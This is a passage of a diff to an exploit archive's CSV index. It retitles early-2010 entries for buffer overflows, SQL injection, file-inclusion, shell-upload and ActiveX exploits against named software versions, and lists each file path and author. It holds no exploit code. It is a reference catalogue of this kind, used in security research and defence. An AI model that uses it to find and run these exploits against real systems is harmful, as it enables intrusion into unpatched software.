Vulnerability",2010-01-15,S2K9,php,webapps,0 -11149,platforms/windows/dos/11149.c,"Sub Station Alpha v4.08 .rt file Local Buffer Overflow PoC",2010-01-15,"fl0 fl0w",windows,dos,0 -11150,platforms/windows/dos/11150.txt,"Aqua Real v1 and 2 Local Crash PoC",2010-01-15,R3d-D3V!L,windows,dos,0 +11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - (.rt) Local Buffer Overflow PoC",2010-01-15,"fl0 fl0w",windows,dos,0 +11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0 & 2.0 - Local Crash PoC",2010-01-15,R3d-D3v!L,windows,dos,0 11151,platforms/windows/remote/11151.html,"IE wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 -11152,platforms/windows/local/11152.py,"Google SketchUp <= v7.1.6087 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0 -11154,platforms/windows/local/11154.py,"BS.Player v2.51 Universal SEH Overflow Exploit",2010-01-16,Dz_attacker,windows,local,0 +11152,platforms/windows/local/11152.py,"Google SketchUp <= 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0 +11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow Exploit",2010-01-16,Dz_attacker,windows,local,0 11155,platforms/php/webapps/11155.txt,"Transload Script Upload Vulnerability",2010-01-16,DigitALL,php,webapps,0 11156,platforms/php/webapps/11156.txt,"PHP-RESIDENCE <= 0.7.2 Multiple LFI Vulnerability",2010-01-16,cr4wl3r,php,webapps,0 11157,platforms/php/webapps/11157.txt,"MoME CMS <= 0.8.5 Remote Login Bypass Exploit",2010-01-16,cr4wl3r,php,webapps,0 @@ -10247,36 +10247,36 @@ id,file,description,date,author,platform,type,port 11166,platforms/php/webapps/11166.txt,"Uploader by CeleronDude 5.3.0 - Upload Vulnerability",2010-01-17,Stink',php,webapps,0 11167,platforms/windows/remote/11167.py,"Internet Explorer Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0 11168,platforms/php/webapps/11168.txt,"Joomla Component com_pc LFI Vulnerability",2010-01-17,Pyske,php,webapps,0 -11169,platforms/php/webapps/11169.txt,"Max's Image Uploader Shell Upload Vulnerability",2010-01-17,indoushka,php,webapps,0 -11171,platforms/windows/local/11171.pl,"Audiotran v1.4.1 direct RET BOF",2010-01-17,Jacky,windows,local,0 -11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom v1.6.2.48 ActiveX Remote Exec 0day POC",2010-01-17,superli,windows,remote,0 +11169,platforms/php/webapps/11169.txt,"Max's Image Uploader Shell Upload Vulnerability",2010-01-17,"indoushka salah el ddine",php,webapps,0 +11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET BoF",2010-01-17,Jacky,windows,local,0 +11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec PoC (0day)",2010-01-17,superli,windows,remote,0 11173,platforms/windows/remote/11173.txt,"TrendMicro Web-Deployment ActiveX Remote Exec 0day POC",2010-01-17,superli,windows,remote,0 11174,platforms/windows/local/11174.c,"VLC v0.8.6 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal)",2010-01-17,"fl0 fl0w",windows,local,0 11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer <= 5.9.14.1246 ActiveX Remote Exec 0day POC",2010-01-17,superli,windows,dos,0 11177,platforms/php/webapps/11177.txt,"Joomla Component com_prime Directory Traversal",2010-01-17,FL0RiX,php,webapps,0 11178,platforms/php/webapps/11178.txt,"Joomla Component com_libros SQL Injection Vulnerability",2010-01-17,FL0RiX,php,webapps,0 -11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server v2.2",2010-01-18,"John Babio",windows,remote,0 +11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2",2010-01-18,"John Babio",windows,remote,0 11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 (.mp3) Local Denial of Service (DoS)",2010-01-18,Red-D3v1L,windows,dos,0 11182,platforms/windows/dos/11182.txt,"Internet Explorer 6/7/8 DOS Vulnerability (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0 11183,platforms/php/webapps/11183.txt,"Multiple directory Traversal Vulnerabilites in Testlink TestManagement and Execution System",2010-01-18,"Prashant Khandelwal",php,webapps,0 11184,platforms/multiple/webapps/11184.txt,"Permanent Cross-Site Scripting (XSS) in FreePBX 2.5.x – 2.6.0",2010-01-18,"Ivan Huertas",multiple,webapps,0 11185,platforms/php/webapps/11185.html,"al3jeb script Remote Change Password Exploit",2010-01-18,alnjm33,php,webapps,0 -11186,platforms/multiple/webapps/11186.txt,"SQL injection in FreePBX 2.5.1",2010-01-18,"Ivan Huertas",multiple,webapps,0 +11186,platforms/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL injection",2010-01-18,"Ivan Huertas",multiple,webapps,0 11187,platforms/multiple/webapps/11187.txt,"Information disclosure in FreePBX 2.5.x",2010-01-18,"Ivan Huertas",multiple,webapps,0 11188,platforms/php/webapps/11188.txt,"Fatwiki (fwiki) Remote FiLe include RFI",2010-01-18,kaMtiEz,php,webapps,0 -11189,platforms/php/webapps/11189.txt,"Soft Direct v1.05 Multiple Vulnerabilities",2010-01-18,indoushka,php,webapps,0 +11189,platforms/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,"indoushka salah el ddine",php,webapps,0 11190,platforms/windows/dos/11190.txt,"AOL 9.5 ActiveX Heap Overflow Vulnerability",2010-01-19,"Hellcode Research",windows,dos,0 -11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio v1.X (.m3u File) Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0 +11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - (.m3u File) Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0 11192,platforms/windows/dos/11192.txt,"OpenOffice "".slk"" File Parsing Null Pointer Vulnerability",2010-01-19,"Hellcode Research",windows,dos,0 11195,platforms/windows/dos/11195.html,"Microsoft Windows Defender ActiveX Heap Overflow PoC",2010-01-19,SarBoT511,windows,dos,0 -11196,platforms/windows/dos/11196.html,"Foxit Reader v3.1.4.1125 ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0 +11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0 11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,cr4wl3r,php,webapps,0 11199,platforms/windows/local/11199.txt,"Windows NT User Mode to Ring 0 Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0 11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BOF (SEH)",2010-01-19,Jacky,windows,local,0 11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0 11204,platforms/windows/remote/11204.html,"AOL 9.5 ActiveX 0day Exploit (heap spray)",2010-01-20,Dz_attacker,windows,remote,0 -11205,platforms/windows/local/11205.pl,"MP3 Studio v1.X (.m3u File) Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0 +11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - (.m3u File) Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0 11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit",2010-01-21,cr4wl3r,windows,local,0 11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic Local Crash Exploit",2010-01-21,cr4wl3r,windows,dos,0 11210,platforms/windows/remote/11210.rb,"EFS Easy Chat server Universal BOF-SEH (Meta)",2010-01-21,FB1H2S,windows,remote,0 @@ -10287,7 +10287,7 @@ id,file,description,date,author,platform,type,port 11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server Version <= 1.9.8/win32 CSRF Vulnerability",2010-01-21,cp77fk4r,windows,webapps,0 11216,platforms/php/webapps/11216.txt,"Blog System 1.x (note) SQL Injection Vuln",2010-01-21,"BorN To K!LL",php,webapps,0 11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 (defer)Remote Buffer Overflow Poc",2010-01-21,SkuLL-HacKeR,windows,dos,0 -11218,platforms/multiple/webapps/11218.txt,"jQuery uploadify v2.1.0 Remote File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 +11218,platforms/multiple/webapps/11218.txt,"jQuery uploadify 2.1.0 - Remote File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 11219,platforms/windows/local/11219.pl,"SOMPL Player Buffer Overflow",2010-01-22,Rick2600,windows,local,0 11220,platforms/windows/remote/11220.py,"IntelliTamper 2.07/2.08 (SEH) Remote Buffer Overflow",2010-01-22,loneferret,windows,remote,0 11222,platforms/php/webapps/11222.txt,"Joomla Component com_gameserver SQL Injection Vulnerability",2010-01-22,B-HUNT3|2,php,webapps,0 @@ -10300,26 +10300,26 @@ id,file,description,date,author,platform,type,port 11229,platforms/windows/local/11229.txt,"IE wshom.ocx (Run) ActiveX Remote Code Execution (add admin user)",2010-01-22,Stack,windows,local,0 11232,platforms/windows/local/11232.c,"Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM exploit",2010-01-22,mu-b,windows,local,0 11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 Remote DoS/Crash Exploit",2010-01-22,"Zer0 Thunder",windows,dos,0 -11234,platforms/windows/dos/11234.py,"Sonique2 v2.0 Beta Build 103 Local Crash PoC",2010-01-23,b0telh0,windows,dos,0 -11235,platforms/php/webapps/11235.txt,"magic-portal v2.1 SQL Injection Vulnerability",2010-01-23,alnjm33,php,webapps,0 +11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash PoC",2010-01-23,b0telh0,windows,dos,0 +11235,platforms/php/webapps/11235.txt,"magic-portal 2.1 - SQL Injection Vulnerability",2010-01-23,alnjm33,php,webapps,0 11236,platforms/php/webapps/11236.txt,"Joomla Component com_ContentBlogList SQL Injection Vulnerability",2010-01-23,B-HUNT3|2,php,webapps,0 11237,platforms/php/webapps/11237.txt,"Joomla (com_casino) SQL Injection Vulnerabilities",2010-01-23,B-HUNT3|2,php,webapps,0 11238,platforms/php/webapps/11238.txt,"Joomla (com_jbpublishdownfp) SQL Injection Vulnerability",2010-01-23,B-HUNT3|2,php,webapps,0 11239,platforms/php/webapps/11239.txt,"Joomla (JBDiary) BLIND SQL Injection Vulnerabilities",2010-01-23,B-HUNT3|2,php,webapps,0 11240,platforms/php/webapps/11240.txt,"OpenDb 1.5.0.4 Multiple LFI Vulnerability",2010-01-23,"ViRuSMaN ",php,webapps,0 11243,platforms/windows/webapps/11243.txt,"Joomla (com_mochigames) SQL Injection Vulnerability",2010-01-24,B-HUNT3|2,windows,webapps,0 -11244,platforms/php/webapps/11244.txt,"Silverstripe <=2.3.5 CSRForgery and Open Redirection Vulnerabilities",2010-01-24,cp77fk4r,php,webapps,0 +11244,platforms/php/webapps/11244.txt,"Silverstripe <= 2.3.5 - CSRForgery and Open Redirection Vulnerabilities",2010-01-24,cp77fk4r,php,webapps,0 11245,platforms/windows/dos/11245.txt,"Firefox 3.6 (XML parser) Memory Corruption PoC/DoS",2010-01-24,d3b4g,windows,dos,0 11247,platforms/windows/dos/11247.txt,"Opera 10.10 (XML parser) Denial of Service PoC",2010-01-24,d3b4g,windows,dos,0 -11248,platforms/windows/dos/11248.pl,"Winamp v5.572 whatsnew.txt Stack Overflow PoC",2010-01-24,Debug,windows,dos,0 -11249,platforms/php/webapps/11249.txt,"boastMachine v3.1 Remote File Upload Vulnerability",2010-01-24,alnjm33,php,webapps,0 -11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server v1.1.1 Denial Of Service Exploit",2010-01-24,"Zer0 Thunder",windows,dos,0 -11255,platforms/windows/local/11255.pl,"Winamp v5.572 whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0 -11256,platforms/windows/local/11256.pl,"Winamp v5.572 whatsnew.txt Local Buffer Overflow Exploit WinXP SP3 De",2010-01-25,NeoCortex,windows,local,0 +11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow PoC",2010-01-24,Debug,windows,dos,0 +11249,platforms/php/webapps/11249.txt,"boastMachine 3.1 - Remote File Upload Vulnerability",2010-01-24,alnjm33,php,webapps,0 +11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial Of Service Exploit",2010-01-24,"Zer0 Thunder",windows,dos,0 +11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0 +11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow Exploit WinXP SP3 De",2010-01-25,NeoCortex,windows,local,0 11257,platforms/windows/remote/11257.rb,"AOL 9.5 Phobos.Playlist 'Import()' Buffer Overflow Exploit (Meta)",2010-01-25,Trancer,windows,remote,0 11258,platforms/php/webapps/11258.html,"Status2k Remote Add Admin Exploit",2010-01-25,alnjm33,php,webapps,0 11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 Local Crash PoC",2010-01-26,b0telh0,windows,dos,0 -11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER V0.2 Shell Upload Vulnerability",2010-01-26,indoushka,php,webapps,0 +11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER V0.2 Shell Upload Vulnerability",2010-01-26,"indoushka salah el ddine",php,webapps,0 11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 connect back exploit",2010-01-26,"Nikola Petrov",php,webapps,0 11263,platforms/php/webapps/11263.php,"Joomla 1.5.12 read/exec remote files",2010-01-26,"Nikoal Petrov",php,webapps,0 11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0 @@ -10328,12 +10328,12 @@ id,file,description,date,author,platform,type,port 11267,platforms/windows/local/11267.py,"Winamp 5.572 Exploit - SEH",2010-01-26,TecR0c,windows,local,0 11270,platforms/php/webapps/11270.txt,"Joomla VirtueMart Module (Customers_who_bought...) SQL Injection Vulnerability",2010-01-27,B-HUNT3|2,php,webapps,0 11271,platforms/php/webapps/11271.txt,"Joomla Component (com_virtuemart) order_status_id SQL Injection Vulnerability",2010-01-27,B-HUNT3|2,php,webapps,0 -11272,platforms/windows/remote/11272.py,"CamShot v1.2 SEH Overwrite Exploit",2010-01-27,tecnik,windows,remote,0 -11273,platforms/hardware/dos/11273.py,"Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS Exploit",2010-01-27,mr_me,hardware,dos,0 +11272,platforms/windows/remote/11272.py,"CamShot 1.2 - SEH Overwrite Exploit",2010-01-27,tecnik,windows,remote,0 +11273,platforms/hardware/dos/11273.py,"iOS Serversman 3.1.5 - HTTP Remote DoS Exploit",2010-01-27,mr_me,hardware,dos,0 11274,platforms/php/webapps/11274.pl,"Woltlab Burningboard Addon Kleinanzeigenmarkt SQL Injection Exploit",2009-12-21,fred777,php,webapps,0 11276,platforms/windows/dos/11276.txt,"Microsoft Internet Explorer 6.0/7.0 NULL pointer crashes",2010-01-20,SkyLined,windows,dos,0 11277,platforms/php/webapps/11277.txt,"Joomla Component com_ccnewsletter Directory Traversal Vulnerability",2010-01-28,B-HUNT3|2,php,webapps,0 -11278,platforms/php/webapps/11278.txt,"NovaBoard v1.1.2 SQL Injection Vulnerability",2010-01-28,Delibey,php,webapps,0 +11278,platforms/php/webapps/11278.txt,"NovaBoard 1.1.2 - SQL Injection Vulnerability",2010-01-28,Delibey,php,webapps,0 11279,platforms/php/webapps/11279.txt,"Joomla Component com_kunena Blind SQL Injection Vulnerability",2010-01-28,B-HUNT3|2,php,webapps,0 11280,platforms/php/webapps/11280.txt,"Joomla Component jVideoDirect Blind SQL Injection Vulnerability",2010-01-28,B-HUNT3|2,php,webapps,0 11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit",2010-01-28,Dlrow,windows,local,0 @@ -10346,39 +10346,39 @@ id,file,description,date,author,platform,type,port 11290,platforms/php/webapps/11290.txt,"phpunity.newsmanager LFI Vulnerability",2010-01-30,kaMtiEz,php,webapps,0 11291,platforms/hardware/dos/11291.txt,"Xerox Workcenter 4150 Remote Buffer Overflow",2010-01-30,"Francis Provencher",hardware,dos,0 11292,platforms/php/webapps/11292.txt,"Joomla Component JE Event Calendar SQL Injection Vulnerability",2010-01-30,B-HUNT3|2,php,webapps,0 -11293,platforms/windows/remote/11293.py,"Vermillion FTP Deamon v1.31 Remote BOF Exploit",2010-01-30,Dz_attacker,windows,remote,0 +11293,platforms/windows/remote/11293.py,"Vermillion FTP Deamon 1.31 - Remote BOF Exploit",2010-01-30,Dz_attacker,windows,remote,0 11294,platforms/php/webapps/11294.txt,"Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0 11295,platforms/asp/webapps/11295.txt,"eWebeditor ASP Version Multiple Vulnerabilities",2010-01-29,N/A,asp,webapps,0 11296,platforms/php/webapps/11296.txt,"ThinkAdmin (page.php) Sql Injection Vulnerability",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0 -11297,platforms/php/webapps/11297.txt,"IPB (nv2) Awards > 1.1.0 SQL Injection PoC",2010-01-30,fred777,php,webapps,0 +11297,platforms/php/webapps/11297.txt,"IPB (nv2) Awards > 1.1.0 - SQL Injection PoC",2010-01-30,fred777,php,webapps,0 11298,platforms/php/webapps/11298.txt,"dotProject 2.1.3 XSS and Improper Permissions",2010-01-30,h00die,php,webapps,80 11299,platforms/php/webapps/11299.txt,"crownweb (page.cfm) Sql Injection Vulnerability",2010-01-31,AtT4CKxT3rR0r1ST,php,webapps,0 11300,platforms/php/webapps/11300.txt,"Creative SplashWorks-SplashSite (page.php) Blind Sql Injection Vulnerability",2010-01-31,AtT4CKxT3rR0r1ST,php,webapps,0 -11301,platforms/php/webapps/11301.txt,"Maian Greetings v2.1 Shell Upload Vulnerability",2010-01-31,indoushka,php,webapps,0 +11301,platforms/php/webapps/11301.txt,"Maian Greetings 2.1 - Shell Upload Vulnerability",2010-01-31,"indoushka salah el ddine",php,webapps,0 11303,platforms/php/webapps/11303.txt,"Saman Portal Sql Injection Vulnerability",2010-01-31,"Pouya Daneshmand",php,webapps,0 11305,platforms/php/webapps/11305.txt,"ShoutCMS (content.php) Blind Sql Injection Vulnerability",2010-02-01,"Zero Cold",php,webapps,0 11306,platforms/php/webapps/11306.txt,"Evernew Free Joke Script (viewjokes.php) SQL Injection",2010-02-01,"Hamza 'MizoZ' N.",php,webapps,0 11307,platforms/php/webapps/11307.txt,"Joomla (Job Component) SQL Injection Vulnerability",2010-02-01,B-HUNT3|2,php,webapps,0 11308,platforms/php/webapps/11308.txt,"Joomla (Yelp Component) SQL Injection Vulnerability",2010-02-01,B-HUNT3|2,php,webapps,0 -11309,platforms/php/webapps/11309.txt,"Snif v1.5.2 - Any Filetype Download Exploit",2010-02-01,Aodrulez,php,webapps,0 +11309,platforms/php/webapps/11309.txt,"Snif 1.5.2 - Any Filetype Download Exploit",2010-02-01,Aodrulez,php,webapps,0 11310,platforms/asp/webapps/11310.txt,"RaakCMS Multiple Vulnerabilities",2010-02-01,"Pouya Daneshmand",asp,webapps,0 -11311,platforms/php/webapps/11311.txt,"Home Of AlegroCart v1.1 - [ Xsrf] Change Administrator Password",2010-02-01,The.Morpheus,php,webapps,0 -11314,platforms/windows/local/11314.py,"CoreFTP v2.1 b1637 (password field) Universal BOF Exploit",2010-02-02,mr_me,windows,local,0 +11311,platforms/php/webapps/11311.txt,"Home Of AlegroCart 1.1 - CSRF Change Administrator Password",2010-02-01,The.Morpheus,php,webapps,0 +11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (password field) Universal BOF Exploit",2010-02-02,mr_me,windows,local,0 11315,platforms/windows/local/11315.c,"Deepburner pro 1.9.0.228 dbr file Buffer Overflow Exploit (Universal)",2010-02-02,"fl0 fl0w",windows,local,0 11316,platforms/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE web services",2010-02-02,R3VAN_BASTARD,php,webapps,0 11317,platforms/windows/local/11317.c,"Qihoo 360 Security Guard breg device drivers Privilege Escalation Vulnerability",2010-02-02,anonymous,windows,local,0 11318,platforms/php/webapps/11318.txt,"Dlili Script SQL Injection Vulnerability",2010-02-02,Dr.DaShEr,php,webapps,0 11319,platforms/php/webapps/11319.txt,"MYRE Classified (cat) SQL Injection Vulnerability",2010-02-02,kaMtiEz,php,webapps,0 11320,platforms/windows/dos/11320.pl,"Digital Amp MP3 3.1 (.Mp3) Local Crash Poc",2010-02-02,SkuLL-HackeR,windows,dos,0 -11321,platforms/php/webapps/11321.txt,"MobPartner Chat Multiple Sql Injection Vulnerabilities",2010-02-02,AtT4CKxT3rR0r1ST,php,webapps,0 +11321,platforms/php/webapps/11321.txt,"MobPartner Chat Multiple Sql Injection Vulnerabilities",2010-02-02,AtT4CKxT3rR0r1ST,php,webapps,0 11322,platforms/php/webapps/11322.txt,"KubeLance 1.7.6 (Add Admin) CSRF Vulnerability",2010-02-03,"Milos Zivanovic",php,webapps,0 11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script (Auth Bypass) SQL Injection",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0 -11324,platforms/jsp/webapps/11324.txt,"Hipergate v4.0.12 Multiple Vulnerabilities",2010-02-03,"Nahuel Grisolia",jsp,webapps,0 +11324,platforms/jsp/webapps/11324.txt,"Hipergate 4.0.12 - Multiple Vulnerabilities",2010-02-03,"Nahuel Grisolia",jsp,webapps,0 11325,platforms/php/webapps/11325.txt,"RealAdmin (detail.php) Blind Sql Injection Vulnerability",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps,0 11326,platforms/php/webapps/11326.txt,"cityadmin (links.php) Blind Sql Injection Vulnerability",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps,0 11327,platforms/php/webapps/11327.txt,"myBusinessAdmin (content.php) Blind Sql Injection Vulnerability",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps,0 -11328,platforms/windows/remote/11328.py,"UplusFtp Server v1.7.0.12 Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote,0 -11329,platforms/php/webapps/11329.txt,"MASA2EL Music City v1.0 Remote Sql Injection Vulnerability",2010-02-04,alnjm33,php,webapps,0 +11328,platforms/windows/remote/11328.py,"UplusFtp Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote,0 +11329,platforms/php/webapps/11329.txt,"MASA2EL Music City 1.0 - Remote SQL Injection Vulnerability",2010-02-04,alnjm33,php,webapps,0 11330,platforms/windows/webapps/11330.txt,"ManageEngine OpUtils 5 ""Login.DO"" SQL Injection Vulnerability",2010-02-04,"Asheesh Anaconda",windows,webapps,0 11331,platforms/windows/local/11331.txt,"Ipswitch IMAIL 11.01 reversible encryption + weak ACL",2010-02-04,sinn3r,windows,local,0 11332,platforms/windows/dos/11332.pl,"Opera 10.10 Remote Code Execution DoS Exploit",2010-02-05,cr4wl3r,windows,dos,0 @@ -10386,30 +10386,30 @@ id,file,description,date,author,platform,type,port 11334,platforms/php/webapps/11334.txt,"Audistats 1.3 SQL injection vulnerability",2010-02-05,kaMtiEz,php,webapps,0 11336,platforms/php/webapps/11336.txt,"Open Bulletin Board Multiple Blind Sql Injection Vulnerability",2010-02-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 11337,platforms/php/webapps/11337.txt,"Joomla (com_photoblog) Blind Sql Injection Vulnerability",2010-02-06,"ALTBTA ",php,webapps,0 -11338,platforms/windows/dos/11338.py,"X-lite SIP v3 (wav) memory corruption Heap BOF exploit",2010-02-06,TecR0c,windows,dos,0 +11338,platforms/windows/dos/11338.py,"X-lite SIP 3.0 - (wav) memory corruption Heap BOF exploit",2010-02-06,TecR0c,windows,dos,0 11339,platforms/php/webapps/11339.txt,"Arab Network Tech. (ANT) CMS SQL Injection",2010-02-06,Tr0y-x,php,webapps,0 11340,platforms/php/webapps/11340.txt,"odlican.net cms 1.5 - Remote File Upload Vulnerability",2010-02-06,Anonymous,php,webapps,0 -11341,platforms/php/webapps/11341.txt,"ShopEx <= Single V4.5.1 Multiple Vulnerabilities",2010-02-06,cp77fk4r,php,webapps,0 -11342,platforms/windows/dos/11342.txt,"SQLite Browser v2.0b1 Local DoS Vulnerability",2010-02-06,"Nishant Das Patnaik",windows,dos,0 -11343,platforms/windows/dos/11343.py,"httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)",2010-02-07,loneferret,windows,dos,0 +11341,platforms/php/webapps/11341.txt,"ShopEx Single <= 4.5.1 - Multiple Vulnerabilities",2010-02-06,cp77fk4r,php,webapps,0 +11342,platforms/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local DoS Vulnerability",2010-02-06,"Nishant Das Patnaik",windows,dos,0 +11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Remote Pre-Authentication DoS (PoC)",2010-02-07,loneferret,windows,dos,0 11344,platforms/php/webapps/11344.txt,"WSN Guest Database Disclosure Vulnerability",2010-02-07,HackXBack,php,webapps,0 11345,platforms/php/webapps/11345.txt,"Zen Tracking <= 2.2 (Auth Bypass) SQL Injection Vulnerability",2010-02-07,cr4wl3r,php,webapps,0 11346,platforms/php/webapps/11346.txt,"Baal Systems <= 3.8 (Auth Bypass) SQL Injection Vulnerability",2010-02-07,cr4wl3r,php,webapps,0 -11347,platforms/windows/dos/11347.html,"Safari v4.0.4, Firefox v3.5.7, SeaMonkey v2.0.1 Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0 -11348,platforms/asp/webapps/11348.txt,"DA Mailing List System V2 Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps,0 +11347,platforms/windows/dos/11347.html,"Safari 4.0.4 + Firefox 3.5.7 + SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0 +11348,platforms/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps,0 11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability",2010-02-07,"T u R c O",php,webapps,0 11350,platforms/php/webapps/11350.txt,"Belkatalog CMS SQL Injection Vulnerability",2010-02-07,Anonymous,php,webapps,0 11351,platforms/solaris/dos/11351.c,"Solaris/Open Solaris UCODE_GET_VERSION IOCTL Denial of Service",2010-02-07,"Patroklos Argyroudis",solaris,dos,0 11352,platforms/php/webapps/11352.txt,"Joomla Component com_productbook SQL Injection Vulnerability",2010-02-07,Snakespc,php,webapps,0 -11353,platforms/php/webapps/11353.txt,"Croogo v1.2.1 Multiple CSRF Vulnerabilities",2010-02-07,"Milos Zivanovic",php,webapps,0 +11353,platforms/php/webapps/11353.txt,"Croogo 1.2.1 - Multiple CSRF Vulnerabilities",2010-02-07,"Milos Zivanovic",php,webapps,0 11354,platforms/php/webapps/11354.txt,"Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability",2010-02-07,cr4wl3r,php,webapps,0 11355,platforms/php/webapps/11355.txt,"EncapsCMS <= 0.3.6 (config[path]) Remote File Include Vulnerability",2010-02-07,cr4wl3r,php,webapps,0 11356,platforms/php/webapps/11356.txt,"Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability",2010-02-07,cr4wl3r,php,webapps,0 11357,platforms/php/webapps/11357.txt,"Uiga Business Portal SQL/ XSS Vulnerability",2010-02-07,"Sioma Labs",php,webapps,0 11358,platforms/php/webapps/11358.txt,"TinyMCE WYSIWYG Editor Multiple Vulnerabilities",2010-02-07,mc2_s3lector,php,webapps,0 -11359,platforms/php/webapps/11359.txt,"JaxCMS v1.0 Local File Include Vulnerability",2010-02-08,"Hamza 'MizoZ' N.",php,webapps,0 +11359,platforms/php/webapps/11359.txt,"JaxCMS 1.0 - Local File Include Vulnerability",2010-02-08,"Hamza 'MizoZ' N.",php,webapps,0 11360,platforms/php/webapps/11360.txt,"Blue Dove Sql Injection Vulnerability",2010-02-08,"HackXBack ",php,webapps,0 -11361,platforms/asp/webapps/11361.txt,"fipsForum v2.6 Remote Database Disclosure Vulnerability",2010-02-09,ViRuSMaN,asp,webapps,0 +11361,platforms/asp/webapps/11361.txt,"fipsForum 2.6 - Remote Database Disclosure Vulnerability",2010-02-09,ViRuSMaN,asp,webapps,0 11363,platforms/windows/dos/11363.c,"UltraISO 9.3.6.2750 Local Buffer Overflow POC (0day)",2010-02-09,"fl0 fl0w",windows,dos,0 11364,platforms/multiple/local/11364.txt,"LDAP Injection POC",2010-02-09,mc2_s3lector,multiple,local,0 11365,platforms/php/webapps/11365.txt,"CPA Site Solutions Remote File Upload Vulnerability",2010-02-09,R3VAN_BASTARD,php,webapps,0 @@ -10418,31 +10418,31 @@ id,file,description,date,author,platform,type,port 11368,platforms/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,HackXBack,php,webapps,0 11369,platforms/asp/webapps/11369.txt,"MOJO's 